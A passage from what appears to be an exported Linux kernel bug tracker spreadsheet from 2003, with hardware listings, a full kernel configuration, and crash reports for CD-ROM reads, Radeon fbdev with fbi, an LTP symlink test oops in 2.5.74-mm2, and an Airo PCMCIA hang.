D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 01:00.0 VGA compatible controller: ATI Technologies Inc Radeon RV200 QW [Radeon 7500] (prog-if 00 [VGA]) Subsystem: Hightech Information System Ltd.: Unknown device 2002 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping+ SERR+ FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 64 (2000ns min), cache line size 08 Interrupt: pin A routed to IRQ 5 Region 0: Memory at c0000000 (32-bit, prefetchable) [size=128M] Region 1: I/O ports at b800 [size=256] Region 2: Memory at cfef0000 (32-bit, non-prefetchable) [size=64K] Expansion ROM at cfec0000 [disabled] [size=128K] Capabilities: [58] AGP version 2.0 Status: RQ=48 Iso- ArqSz=0 Cal=0 SBA+ ITACoh- GART64- HTrans- 64bit- FW- AGP3- Rate=x1,x2,x4 Command: RQ=32 ArqSz=0 Cal=0 SBA+ AGP+ GART64- 64bit- FW- Rate=x1 Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Software Environment: # # Automatically generated make config: don't edit # CONFIG_X86=y CONFIG_MMU=y CONFIG_UID16=y CONFIG_GENERIC_ISA_DMA=y # # Code maturity level options # CONFIG_EXPERIMENTAL=y # # General setup # CONFIG_SWAP=y CONFIG_SYSVIPC=y # CONFIG_BSD_PROCESS_ACCT is not set CONFIG_SYSCTL=y CONFIG_LOG_BUF_SHIFT=14 # CONFIG_EMBEDDED is not set CONFIG_FUTEX=y CONFIG_EPOLL=y # # Loadable module support # CONFIG_MODULES=y CONFIG_MODULE_UNLOAD=y CONFIG_MODULE_FORCE_UNLOAD=y CONFIG_OBSOLETE_MODPARM=y # CONFIG_MODVERSIONS is not set CONFIG_KMOD=y # # Processor type and features # CONFIG_X86_PC=y # CONFIG_X86_VOYAGER is not set # CONFIG_X86_NUMAQ is not set # CONFIG_X86_SUMMIT is not set # CONFIG_X86_BIGSMP is not set # CONFIG_X86_VISWS is not set # CONFIG_X86_GENERICARCH is not set # CONFIG_X86_ES7000 is not set # CONFIG_M386 is not set # CONFIG_M486 is not set # CONFIG_M586 is not set # CONFIG_M586TSC is not set # CONFIG_M586MMX is not set # CONFIG_M686 is not set # CONFIG_MPENTIUMII is not set # CONFIG_MPENTIUMIII is not set # CONFIG_MPENTIUM4 is not set # CONFIG_MK6 is not set CONFIG_MK7=y # CONFIG_MK8 is not set # CONFIG_MELAN is not set # CONFIG_MCRUSOE is not set # CONFIG_MWINCHIPC6 is not set # CONFIG_MWINCHIP2 is not set # CONFIG_MWINCHIP3D is not set # CONFIG_MCYRIXIII is not set # CONFIG_MVIAC3_2 is not set CONFIG_X86_GENERIC=y CONFIG_X86_CMPXCHG=y CONFIG_X86_XADD=y CONFIG_X86_L1_CACHE_SHIFT=7 CONFIG_RWSEM_XCHGADD_ALGORITHM=y CONFIG_X86_WP_WORKS_OK=y CONFIG_X86_INVLPG=y CONFIG_X86_BSWAP=y CONFIG_X86_POPAD_OK=y CONFIG_X86_GOOD_APIC=y CONFIG_X86_INTEL_USERCOPY=y CONFIG_X86_USE_PPRO_CHECKSUM=y CONFIG_X86_USE_3DNOW=y # CONFIG_HUGETLB_PAGE is not set # CONFIG_SMP is not set CONFIG_PREEMPT=y CONFIG_X86_UP_APIC=y CONFIG_X86_UP_IOAPIC=y CONFIG_X86_LOCAL_APIC=y CONFIG_X86_IO_APIC=y CONFIG_X86_TSC=y CONFIG_X86_MCE=y CONFIG_X86_MCE_NONFATAL=y # CONFIG_X86_MCE_P4THERMAL is not set # CONFIG_TOSHIBA is not set # CONFIG_I8K is not set # CONFIG_MICROCODE is not set # CONFIG_X86_MSR is not set # CONFIG_X86_CPUID is not set CONFIG_EDD=y CONFIG_NOHIGHMEM=y # CONFIG_HIGHMEM4G is not set # CONFIG_HIGHMEM64G is not set # CONFIG_MATH_EMULATION is not set CONFIG_MTRR=y CONFIG_HAVE_DEC_LOCK=y # # Power management options (ACPI, APM) # CONFIG_PM=y # CONFIG_SOFTWARE_SUSPEND is not set # # ACPI Support # CONFIG_ACPI=y # CONFIG_ACPI_HT_ONLY is not set CONFIG_ACPI_BOOT=y CONFIG_ACPI_AC=y CONFIG_ACPI_BATTERY=y CONFIG_ACPI_BUTTON=y CONFIG_ACPI_FAN=y CONFIG_ACPI_PROCESSOR=y CONFIG_ACPI_THERMAL=y # CONFIG_ACPI_ASUS is not set # CONFIG_ACPI_TOSHIBA is not set CONFIG_ACPI_DEBUG=y CONFIG_ACPI_BUS=y CONFIG_ACPI_INTERPRETER=y CONFIG_ACPI_EC=y CONFIG_ACPI_POWER=y CONFIG_ACPI_PCI=y CONFIG_ACPI_SYSTEM=y # CONFIG_APM is not set # # CPU Frequency scaling # # CONFIG_CPU_FREQ is not set # # Bus options (PCI, PCMCIA, EISA, MCA, ISA) # CONFIG_PCI=y # CONFIG_PCI_GOBIOS is not set # CONFIG_PCI_GODIRECT is not set CONFIG_PCI_GOANY=y CONFIG_PCI_BIOS=y CONFIG_PCI_DIRECT=y # CONFIG_PCI_LEGACY_PROC is not set CONFIG_PCI_NAMES=y # CONFIG_ISA is not set # CONFIG_MCA is not set # CONFIG_SCx200 is not set CONFIG_HOTPLUG=y # # PCMCIA/CardBus support # # CONFIG_PCMCIA is not set # # PCI Hotplug Support # # CONFIG_HOTPLUG_PCI is not set # # Executable file formats # CONFIG_KCORE_ELF=y # CONFIG_KCORE_AOUT is not set CONFIG_BINFMT_ELF=y CONFIG_BINFMT_AOUT=y CONFIG_BINFMT_MISC=y # # Generic Driver Options # # CONFIG_FW_LOADER is not set # # Memory Technology Devices (MTD) # # CONFIG_MTD is not set # # Parallel port support # CONFIG_PARPORT=y CONFIG_PARPORT_PC=y CONFIG_PARPORT_PC_CML1=y # CONFIG_PARPORT_SERIAL is not set # CONFIG_PARPORT_PC_FIFO is not set # CONFIG_PARPORT_PC_SUPERIO is not set # CONFIG_PARPORT_OTHER is not set CONFIG_PARPORT_1284=y # # Plug and Play support # CONFIG_PNP=y CONFIG_PNP_NAMES=y # CONFIG_PNP_DEBUG is not set # # Protocols # # CONFIG_ISAPNP is not set # CONFIG_PNPBIOS is not set # # Block devices # CONFIG_BLK_DEV_FD=y # CONFIG_PARIDE is not set # CONFIG_BLK_CPQ_DA is not set # CONFIG_BLK_CPQ_CISS_DA is not set # CONFIG_BLK_DEV_DAC960 is not set # CONFIG_BLK_DEV_UMEM is not set # CONFIG_BLK_DEV_LOOP is not set # CONFIG_BLK_DEV_NBD is not set # CONFIG_BLK_DEV_RAM is not set # CONFIG_BLK_DEV_INITRD is not set CONFIG_LBD=y # # ATA/ATAPI/MFM/RLL support # CONFIG_IDE=y # # IDE, ATA and ATAPI Block devices # CONFIG_BLK_DEV_IDE=y # # Please see Documentation/ide.txt for help/info on IDE drives # # CONFIG_BLK_DEV_HD_IDE is not set # CONFIG_BLK_DEV_HD is not set CONFIG_BLK_DEV_IDEDISK=y CONFIG_IDEDISK_MULTI_MODE=y # CONFIG_IDEDISK_STROKE is not set CONFIG_BLK_DEV_IDECD=y # CONFIG_BLK_DEV_IDEFLOPPY is not set CONFIG_BLK_DEV_IDESCSI=y # CONFIG_IDE_TASK_IOCTL is not set CONFIG_IDE_TASKFILE_IO=y # # IDE chipset support/bugfixes # # CONFIG_BLK_DEV_CMD640 is not set # CONFIG_BLK_DEV_IDEPNP is not set CONFIG_BLK_DEV_IDEPCI=y CONFIG_BLK_DEV_GENERIC=y CONFIG_IDEPCI_SHARE_IRQ=y CONFIG_BLK_DEV_IDEDMA_PCI=y # CONFIG_BLK_DEV_IDE_TCQ is not set # CONFIG_BLK_DEV_OFFBOARD is not set # CONFIG_BLK_DEV_IDEDMA_FORCED is not set CONFIG_IDEDMA_PCI_AUTO=y # CONFIG_IDEDMA_ONLYDISK is not set CONFIG_BLK_DEV_IDEDMA=y # CONFIG_IDEDMA_PCI_WIP is not set CONFIG_BLK_DEV_ADMA=y # CONFIG_BLK_DEV_AEC62XX is not set # CONFIG_BLK_DEV_ALI15X3 is not set # CONFIG_BLK_DEV_AMD74XX is not set # CONFIG_BLK_DEV_CMD64X is not set # CONFIG_BLK_DEV_TRIFLEX is not set # CONFIG_BLK_DEV_CY82C693 is not set # CONFIG_BLK_DEV_CS5520 is not set # CONFIG_BLK_DEV_HPT34X is not set # CONFIG_BLK_DEV_HPT366 is not set # CONFIG_BLK_DEV_SC1200 is not set # CONFIG_BLK_DEV_PIIX is not set # CONFIG_BLK_DEV_NS87415 is not set # CONFIG_BLK_DEV_OPTI621 is not set # CONFIG_BLK_DEV_PDC202XX_OLD is not set # CONFIG_BLK_DEV_PDC202XX_NEW is not set # CONFIG_BLK_DEV_RZ1000 is not set # CONFIG_BLK_DEV_SVWKS is not set # CONFIG_BLK_DEV_SIIMAGE is not set CONFIG_BLK_DEV_SIS5513=y # CONFIG_BLK_DEV_SLC90E66 is not set # CONFIG_BLK_DEV_TRM290 is not set # CONFIG_BLK_DEV_VIA82CXXX is not set CONFIG_IDEDMA_AUTO=y # CONFIG_IDEDMA_IVB is not set CONFIG_BLK_DEV_IDE_MODES=y # # SCSI device support # CONFIG_SCSI=y # # SCSI support type (disk, tape, CD-ROM) # # CONFIG_BLK_DEV_SD is not set # CONFIG_CHR_DEV_ST is not set # CONFIG_CHR_DEV_OSST is not set CONFIG_BLK_DEV_SR=y # CONFIG_BLK_DEV_SR_VENDOR is not set CONFIG_CHR_DEV_SG=y # # Some SCSI devices (e.g. CD jukebox) support multiple LUNs # # CONFIG_SCSI_MULTI_LUN is not set CONFIG_SCSI_REPORT_LUNS=y # CONFIG_SCSI_CONSTANTS is not set # CONFIG_SCSI_LOGGING is not set # # SCSI low-level drivers # # CONFIG_BLK_DEV_3W_XXXX_RAID is not set # CONFIG_SCSI_ACARD is not set # CONFIG_SCSI_AACRAID is not set # CONFIG_SCSI_AIC7XXX is not set # CONFIG_SCSI_AIC7XXX_OLD is not set # CONFIG_SCSI_AIC79XX is not set # CONFIG_SCSI_DPT_I2O is not set # CONFIG_SCSI_ADVANSYS is not set # CONFIG_SCSI_AM53C974 is not set # CONFIG_SCSI_MEGARAID is not set # CONFIG_SCSI_BUSLOGIC is not set # CONFIG_SCSI_CPQFCTS is not set # CONFIG_SCSI_DMX3191D is not set # CONFIG_SCSI_EATA is not set # CONFIG_SCSI_EATA_PIO is not set # CONFIG_SCSI_FUTURE_DOMAIN is not set # CONFIG_SCSI_GDTH is not set # CONFIG_SCSI_IPS is not set # CONFIG_SCSI_INITIO is not set # CONFIG_SCSI_INIA100 is not set # CONFIG_SCSI_PPA is not set # CONFIG_SCSI_IMM is not set # CONFIG_SCSI_SYM53C8XX_2 is not set # CONFIG_SCSI_SYM53C8XX is not set # CONFIG_SCSI_PCI2000 is not set # CONFIG_SCSI_PCI2220I is not set # CONFIG_SCSI_QLOGIC_ISP is not set # CONFIG_SCSI_QLOGIC_FC is not set # CONFIG_SCSI_QLOGIC_1280 is not set # CONFIG_SCSI_DC395x is not set # CONFIG_SCSI_DC390T is not set # CONFIG_SCSI_NSP32 is not set # CONFIG_SCSI_DEBUG is not set # # Multi-device support (RAID and LVM) # # CONFIG_MD is not set # # Fusion MPT device support # # # IEEE 1394 (FireWire) support (EXPERIMENTAL) # # CONFIG_IEEE1394 is not set # # I2O device support # # CONFIG_I2O is not set # # Networking support # CONFIG_NET=y # # Networking options # CONFIG_PACKET=y # CONFIG_PACKET_MMAP is not set # CONFIG_NETLINK_DEV is not set # CONFIG_NETFILTER is not set CONFIG_UNIX=y # CONFIG_NET_KEY is not set CONFIG_INET=y CONFIG_IP_MULTICAST=y # CONFIG_IP_ADVANCED_ROUTER is not set # CONFIG_IP_PNP is not set # CONFIG_NET_IPIP is not set # CONFIG_NET_IPGRE is not set # CONFIG_IP_MROUTE is not set # CONFIG_ARPD is not set # CONFIG_INET_ECN is not set # CONFIG_SYN_COOKIES is not set # CONFIG_INET_AH is not set # CONFIG_INET_ESP is not set # CONFIG_INET_IPCOMP is not set CONFIG_IPV6=y # CONFIG_IPV6_PRIVACY is not set # CONFIG_INET6_AH is not set # CONFIG_INET6_ESP is not set CONFIG_INET6_IPCOMP=y # CONFIG_IPV6_TUNNEL is not set CONFIG_XFRM_USER=y # # SCTP Configuration (EXPERIMENTAL) # CONFIG_IPV6_SCTP__=y # CONFIG_IP_SCTP is not set # CONFIG_ATM is not set # CONFIG_VLAN_8021Q is not set # CONFIG_LLC is not set # CONFIG_DECNET is not set # CONFIG_BRIDGE is not set # CONFIG_X25 is not set # CONFIG_LAPB is not set # CONFIG_NET_DIVERT is not set # CONFIG_ECONET is not set # CONFIG_WAN_ROUTER is not set # CONFIG_NET_FASTROUTE is not set # CONFIG_NET_HW_FLOWCONTROL is not set # # QoS and/or fair queueing # # CONFIG_NET_SCHED is not set # # Network testing # # CONFIG_NET_PKTGEN is not set CONFIG_NETDEVICES=y # # ARCnet devices # # CONFIG_ARCNET is not set # CONFIG_DUMMY is not set # CONFIG_BONDING is not set # CONFIG_EQUALIZER is not set # CONFIG_TUN is not set # CONFIG_ETHERTAP is not set # CONFIG_NET_SB1000 is not set # # Ethernet (10 or 100Mbit) # CONFIG_NET_ETHERNET=y # CONFIG_MII is not set # CONFIG_HAPPYMEAL is not set # CONFIG_SUNGEM is not set # CONFIG_NET_VENDOR_3COM is not set # # Tulip family network device support # # CONFIG_NET_TULIP is not set # CONFIG_HP100 is not set CONFIG_NET_PCI=y # CONFIG_PCNET32 is not set # CONFIG_AMD8111_ETH is not set # CONFIG_ADAPTEC_STARFIRE is not set # CONFIG_B44 is not set # CONFIG_DGRS is not set # CONFIG_EEPRO100 is not set # CONFIG_E100 is not set # CONFIG_FEALNX is not set # CONFIG_NATSEMI is not set # CONFIG_NE2K_PCI is not set # CONFIG_8139CP is not set # CONFIG_8139TOO is not set CONFIG_SIS900=y # CONFIG_EPIC100 is not set # CONFIG_SUNDANCE is not set # CONFIG_TLAN is not set # CONFIG_VIA_RHINE is not set # # Ethernet (1000 Mbit) # # CONFIG_ACENIC is not set # CONFIG_DL2K is not set # CONFIG_E1000 is not set # CONFIG_NS83820 is not set # CONFIG_HAMACHI is not set # CONFIG_YELLOWFIN is not set # CONFIG_R8169 is not set # CONFIG_SK98LIN is not set # CONFIG_TIGON3 is not set # # Ethernet (10000 Mbit) # # CONFIG_IXGB is not set # CONFIG_FDDI is not set # CONFIG_HIPPI is not set # CONFIG_PLIP is not set # CONFIG_PPP is not set # CONFIG_SLIP is not set # # Wireless LAN (non-hamradio) # # CONFIG_NET_RADIO is not set # # Token Ring devices (depends on LLC=y) # # CONFIG_NET_FC is not set # CONFIG_RCPCI is not set # CONFIG_SHAPER is not set # # Wan interfaces # # CONFIG_WAN is not set # # Amateur Radio support # # CONFIG_HAMRADIO is not set # # IrDA (infrared) support # # CONFIG_IRDA is not set # # ISDN subsystem # # CONFIG_ISDN_BOOL is not set # # Telephony Support # # CONFIG_PHONE is not set # # Input device support # CONFIG_INPUT=y # # Userland interfaces # CONFIG_INPUT_MOUSEDEV=y CONFIG_INPUT_MOUSEDEV_PSAUX=y CONFIG_INPUT_MOUSEDEV_SCREEN_X=1024 CONFIG_INPUT_MOUSEDEV_SCREEN_Y=768 # CONFIG_INPUT_JOYDEV is not set # CONFIG_INPUT_TSDEV is not set # CONFIG_INPUT_EVDEV is not set # CONFIG_INPUT_EVBUG is not set # # Input I/O drivers # # CONFIG_GAMEPORT is not set CONFIG_SOUND_GAMEPORT=y CONFIG_SERIO=y CONFIG_SERIO_I8042=y # CONFIG_SERIO_SERPORT is not set # CONFIG_SERIO_CT82C710 is not set # CONFIG_SERIO_PARKBD is not set # CONFIG_SERIO_PCIPS2 is not set # # Input Device Drivers # CONFIG_INPUT_KEYBOARD=y CONFIG_KEYBOARD_ATKBD=y # CONFIG_KEYBOARD_SUNKBD is not set # CONFIG_KEYBOARD_XTKBD is not set # CONFIG_KEYBOARD_NEWTON is not set CONFIG_INPUT_MOUSE=y CONFIG_MOUSE_PS2=y # CONFIG_MOUSE_SERIAL is not set # CONFIG_INPUT_JOYSTICK is not set # CONFIG_INPUT_TOUCHSCREEN is not set # CONFIG_INPUT_MISC is not set # # Character devices # CONFIG_VT=y CONFIG_VT_CONSOLE=y CONFIG_HW_CONSOLE=y # CONFIG_SERIAL_NONSTANDARD is not set # # Serial drivers # CONFIG_SERIAL_8250=y # CONFIG_SERIAL_8250_CONSOLE is not set # CONFIG_SERIAL_8250_ACPI is not set # CONFIG_SERIAL_8250_EXTENDED is not set # # Non-8250 serial port support # CONFIG_SERIAL_CORE=y CONFIG_UNIX98_PTYS=y CONFIG_UNIX98_PTY_COUNT=256 # CONFIG_PRINTER is not set # CONFIG_PPDEV is not set # CONFIG_TIPAR is not set # # I2C support # # CONFIG_I2C is not set # # I2C Hardware Sensors Mainboard support # # # I2C Hardware Sensors Chip support # # CONFIG_I2C_SENSOR is not set # # Mice # # CONFIG_BUSMOUSE is not set # CONFIG_QIC02_TAPE is not set # # IPMI # # CONFIG_IPMI_HANDLER is not set # # Watchdog Cards # # CONFIG_WATCHDOG is not set CONFIG_HW_RANDOM=y # CONFIG_NVRAM is not set CONFIG_RTC=y # CONFIG_DTLK is not set # CONFIG_R3964 is not set # CONFIG_APPLICOM is not set # CONFIG_SONYPI is not set # # Ftape, the floppy tape device driver # # CONFIG_FTAPE is not set CONFIG_AGP=y # CONFIG_AGP_ALI is not set # CONFIG_AGP_AMD is not set # CONFIG_AGP_AMD_8151 is not set # CONFIG_AGP_INTEL is not set # CONFIG_AGP_NVIDIA is not set CONFIG_AGP_SIS=y # CONFIG_AGP_SWORKS is not set # CONFIG_AGP_VIA is not set CONFIG_DRM=y # CONFIG_DRM_TDFX is not set # CONFIG_DRM_GAMMA is not set # CONFIG_DRM_R128 is not set CONFIG_DRM_RADEON=m # CONFIG_DRM_MGA is not set # CONFIG_MWAVE is not set # CONFIG_RAW_DRIVER is not set # CONFIG_HANGCHECK_TIMER is not set # # Multimedia devices # # CONFIG_VIDEO_DEV is not set # # Digital Video Broadcasting Devices # # CONFIG_DVB is not set # # File systems # CONFIG_EXT2_FS=y CONFIG_EXT2_FS_XATTR=y # CONFIG_EXT2_FS_POSIX_ACL is not set # CONFIG_EXT2_FS_SECURITY is not set CONFIG_EXT3_FS=y CONFIG_EXT3_FS_XATTR=y CONFIG_EXT3_FS_POSIX_ACL=y # CONFIG_EXT3_FS_SECURITY is not set CONFIG_JBD=y # CONFIG_JBD_DEBUG is not set CONFIG_FS_MBCACHE=y CONFIG_REISERFS_FS=y # CONFIG_REISERFS_CHECK is not set # CONFIG_REISERFS_PROC_INFO is not set # CONFIG_JFS_FS is not set CONFIG_FS_POSIX_ACL=y CONFIG_XFS_FS=y # CONFIG_XFS_RT is not set CONFIG_XFS_QUOTA=y CONFIG_XFS_POSIX_ACL=y # CONFIG_MINIX_FS is not set # CONFIG_ROMFS_FS is not set # CONFIG_QUOTA is not set CONFIG_QUOTACTL=y # CONFIG_AUTOFS_FS is not set CONFIG_AUTOFS4_FS=y # # CD-ROM/DVD Filesystems # CONFIG_ISO9660_FS=y CONFIG_JOLIET=y # CONFIG_ZISOFS is not set CONFIG_UDF_FS=y # # DOS/FAT/NT Filesystems # CONFIG_FAT_FS=y CONFIG_MSDOS_FS=y CONFIG_VFAT_FS=y # CONFIG_NTFS_FS is not set # # Pseudo filesystems # CONFIG_PROC_FS=y # CONFIG_DEVFS_FS is not set CONFIG_DEVPTS_FS=y # CONFIG_DEVPTS_FS_XATTR is not set CONFIG_TMPFS=y CONFIG_RAMFS=y # # Miscellaneous filesystems # # CONFIG_ADFS_FS is not set # CONFIG_AFFS_FS is not set # CONFIG_HFS_FS is not set # CONFIG_BEFS_FS is not set # CONFIG_BFS_FS is not set # CONFIG_EFS_FS is not set # CONFIG_CRAMFS is not set # CONFIG_VXFS_FS is not set # CONFIG_HPFS_FS is not set # CONFIG_QNX4FS_FS is not set # CONFIG_SYSV_FS is not set # CONFIG_UFS_FS is not set # # Network File Systems # CONFIG_NFS_FS=y CONFIG_NFS_V3=y CONFIG_NFS_V4=y CONFIG_NFSD=y CONFIG_NFSD_V3=y CONFIG_NFSD_V4=y CONFIG_NFSD_TCP=y CONFIG_LOCKD=y CONFIG_LOCKD_V4=y CONFIG_EXPORTFS=y CONFIG_SUNRPC=y CONFIG_SUNRPC_GSS=y CONFIG_RPCSEC_GSS_KRB5=y # CONFIG_SMB_FS is not set # CONFIG_CIFS is not set # CONFIG_NCP_FS is not set # CONFIG_CODA_FS is not set # CONFIG_INTERMEZZO_FS is not set # CONFIG_AFS_FS is not set # # Partition Types # # CONFIG_PARTITION_ADVANCED is not set CONFIG_MSDOS_PARTITION=y CONFIG_NLS=y # # Native Language Support # CONFIG_NLS_DEFAULT="iso8859-1" CONFIG_NLS_CODEPAGE_437=y # CONFIG_NLS_CODEPAGE_737 is not set # CONFIG_NLS_CODEPAGE_775 is not set CONFIG_NLS_CODEPAGE_850=y # CONFIG_NLS_CODEPAGE_852 is not set # CONFIG_NLS_CODEPAGE_855 is not set # CONFIG_NLS_CODEPAGE_857 is not set # CONFIG_NLS_CODEPAGE_860 is not set # CONFIG_NLS_CODEPAGE_861 is not set # CONFIG_NLS_CODEPAGE_862 is not set # CONFIG_NLS_CODEPAGE_863 is not set # CONFIG_NLS_CODEPAGE_864 is not set # CONFIG_NLS_CODEPAGE_865 is not set # CONFIG_NLS_CODEPAGE_866 is not set # CONFIG_NLS_CODEPAGE_869 is not set # CONFIG_NLS_CODEPAGE_936 is not set # CONFIG_NLS_CODEPAGE_950 is not set # CONFIG_NLS_CODEPAGE_932 is not set # CONFIG_NLS_CODEPAGE_949 is not set # CONFIG_NLS_CODEPAGE_874 is not set # CONFIG_NLS_ISO8859_8 is not set # CONFIG_NLS_CODEPAGE_1250 is not set # CONFIG_NLS_CODEPAGE_1251 is not set CONFIG_NLS_ISO8859_1=y # CONFIG_NLS_ISO8859_2 is not set # CONFIG_NLS_ISO8859_3 is not set # CONFIG_NLS_ISO8859_4 is not set # CONFIG_NLS_ISO8859_5 is not set # CONFIG_NLS_ISO8859_6 is not set # CONFIG_NLS_ISO8859_7 is not set # CONFIG_NLS_ISO8859_9 is not set # CONFIG_NLS_ISO8859_13 is not set # CONFIG_NLS_ISO8859_14 is not set # CONFIG_NLS_ISO8859_15 is not set # CONFIG_NLS_KOI8_R is not set # CONFIG_NLS_KOI8_U is not set # CONFIG_NLS_UTF8 is not set # # Graphics support # CONFIG_FB=y # CONFIG_FB_CIRRUS is not set # CONFIG_FB_PM2 is not set # CONFIG_FB_CYBER2000 is not set # CONFIG_FB_IMSTT is not set # CONFIG_FB_VGA16 is not set # CONFIG_FB_VESA is not set CONFIG_VIDEO_SELECT=y # CONFIG_FB_HGA is not set # CONFIG_FB_RIVA is not set # CONFIG_FB_MATROX is not set CONFIG_FB_RADEON=y # CONFIG_FB_ATY128 is not set # CONFIG_FB_ATY is not set # CONFIG_FB_SIS is not set # CONFIG_FB_NEOMAGIC is not set # CONFIG_FB_3DFX is not set # CONFIG_FB_VOODOO1 is not set # CONFIG_FB_TRIDENT is not set # CONFIG_FB_PM3 is not set # CONFIG_FB_VIRTUAL is not set # # Console display driver support # # CONFIG_VGA_CONSOLE is not set # CONFIG_MDA_CONSOLE is not set CONFIG_DUMMY_CONSOLE=y CONFIG_FRAMEBUFFER_CONSOLE=y CONFIG_PCI_CONSOLE=y CONFIG_FONTS=y CONFIG_FONT_8x8=y # CONFIG_FONT_8x16 is not set # CONFIG_FONT_6x11 is not set # CONFIG_FONT_PEARL_8x8 is not set # CONFIG_FONT_ACORN_8x8 is not set # CONFIG_FONT_MINI_4x6 is not set # CONFIG_FONT_SUN8x16 is not set # CONFIG_FONT_SUN12x22 is not set # # Logo configuration # # CONFIG_LOGO is not set # # Sound # CONFIG_SOUND=y # # Advanced Linux Sound Architecture # # CONFIG_SND is not set # # Open Sound System # CONFIG_SOUND_PRIME=y # CONFIG_SOUND_BT878 is not set # CONFIG_SOUND_CMPCI is not set # CONFIG_SOUND_EMU10K1 is not set # CONFIG_SOUND_FUSION is not set # CONFIG_SOUND_CS4281 is not set # CONFIG_SOUND_ES1370 is not set # CONFIG_SOUND_ES1371 is not set # CONFIG_SOUND_ESSSOLO1 is not set # CONFIG_SOUND_MAESTRO is not set # CONFIG_SOUND_MAESTRO3 is not set CONFIG_SOUND_ICH=y # CONFIG_SOUND_RME96XX is not set # CONFIG_SOUND_SONICVIBES is not set # CONFIG_SOUND_TRIDENT is not set # CONFIG_SOUND_MSNDCLAS is not set # CONFIG_SOUND_MSNDPIN is not set # CONFIG_SOUND_VIA82CXXX is not set # CONFIG_SOUND_OSS is not set # # USB support # # CONFIG_USB is not set # CONFIG_USB_GADGET is not set # # Bluetooth support # # CONFIG_BT is not set # # Profiling support # # CONFIG_PROFILING is not set # # Kernel hacking # # CONFIG_DEBUG_KERNEL is not set CONFIG_KALLSYMS=y CONFIG_DEBUG_SPINLOCK_SLEEP=y CONFIG_FRAME_POINTER=y CONFIG_X86_EXTRA_IRQS=y CONFIG_X86_FIND_SMP_CONFIG=y CONFIG_X86_MPPARSE=y # # Security options # # CONFIG_SECURITY is not set # # Cryptographic options # CONFIG_CRYPTO=y CONFIG_CRYPTO_HMAC=y CONFIG_CRYPTO_NULL=y CONFIG_CRYPTO_MD4=y CONFIG_CRYPTO_MD5=y CONFIG_CRYPTO_SHA1=y CONFIG_CRYPTO_SHA256=y CONFIG_CRYPTO_SHA512=y CONFIG_CRYPTO_DES=y CONFIG_CRYPTO_BLOWFISH=y CONFIG_CRYPTO_TWOFISH=y CONFIG_CRYPTO_SERPENT=y CONFIG_CRYPTO_AES=y CONFIG_CRYPTO_DEFLATE=y # CONFIG_CRYPTO_TEST is not set # # Library routines # # CONFIG_CRC32 is not set CONFIG_ZLIB_INFLATE=y CONFIG_ZLIB_DEFLATE=y CONFIG_X86_BIOS_REBOOT=y Problem Description: I tried to read from a freshly burned CDROM when the machine crashed hard. I've been unable to reproduce that so far. A problem like that never occured before (I'm running the latest bk-snapshot about every week).</t>
  </si>
  <si>
    <t>radeon fbdev oopses when watching a picture on the console with fbi</t>
  </si>
  <si>
    <t>2003-07-06 07:58 UTC</t>
  </si>
  <si>
    <t>2004-02-29 06:30 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian testing Hardware Environment: ATI Technologies Inc Radeon RV200 QW [Radeon 7500] (prog-if 00 [VGA]) Software Environment: fbi 1.26 (http://bytesex.org/fbi.html Problem Description: Displaying arbitraty pictures on the console with fbi leads to the attached oopsen. Steps to reproduce: $ fbi picture-file</t>
  </si>
  <si>
    <t>LTP symlink01 test causes oops in 2.5.74-mm2</t>
  </si>
  <si>
    <t>2.5.74-mm2</t>
  </si>
  <si>
    <t>2003-07-07 08:40 UTC</t>
  </si>
  <si>
    <t>2003-08-14 12:35 UTC</t>
  </si>
  <si>
    <t>Distribution: RedHat 7.3 Hardware Environment: 8-way PIII 700, 16GB ram Software Environment: gcc 2.96, Linux-2.5.74-mm2, ext3 (I will attach the kernel config in a bit) Problem Description: This oops does not cause the system to crash or hang. Unable to handle kernel NULL pointer dereference at virtual address 00000000 printing eip: 00000000 *pde = 3546d001 Oops: 0000 [#1] SMP CPU: 0 EIP: 0060:[&lt;00000000&gt;] Not tainted VLI EFLAGS: 00010282 EIP is at 0x0 eax: c0399ec0 ebx: fffffff4 ecx: f593ebe0 edx: f5529f78 esi: f593ea80 edi: f5452e50 ebp: f5529f70 esp: f5529ef0 ds: 007b es: 007b ss: 0068 Process symlink01 (pid: 4003, threadinfo=f5528000 task=f57c86f0) Stack: c015ffc8 f5452e50 f593ea80 f5529f70 f593ebc0 f593ebc0 f5529f70 00000041 c01607c0 f5529f78 f593ebc0 f5529f70 00000001 00000004 f593ebc0 00000000 00030002 1e79d078 3f097ddb 1e79d078 3f097ddb 1e79d078 000343b3 00000040 Call Trace: [&lt;c015ffc8&gt;] __lookup_hash+0x78/0xa0 [&lt;c01607c0&gt;] open_namei+0x3b0/0x3e0 [&lt;c01517a6&gt;] filp_open+0x36/0x60 [&lt;c0151b85&gt;] sys_open+0x35/0x70 [&lt;c0108ff3&gt;] syscall_call+0x7/0xb Code: Bad EIP value. Steps to reproduce: Run the symlink01 test from LTP</t>
  </si>
  <si>
    <t>bad scheduling while atomic and machine hangs with pcmcia and airo 350</t>
  </si>
  <si>
    <t>2003-07-08 04:01 UTC</t>
  </si>
  <si>
    <t>Bip Thelin</t>
  </si>
  <si>
    <t>2003-07-16 09:38 UTC</t>
  </si>
  <si>
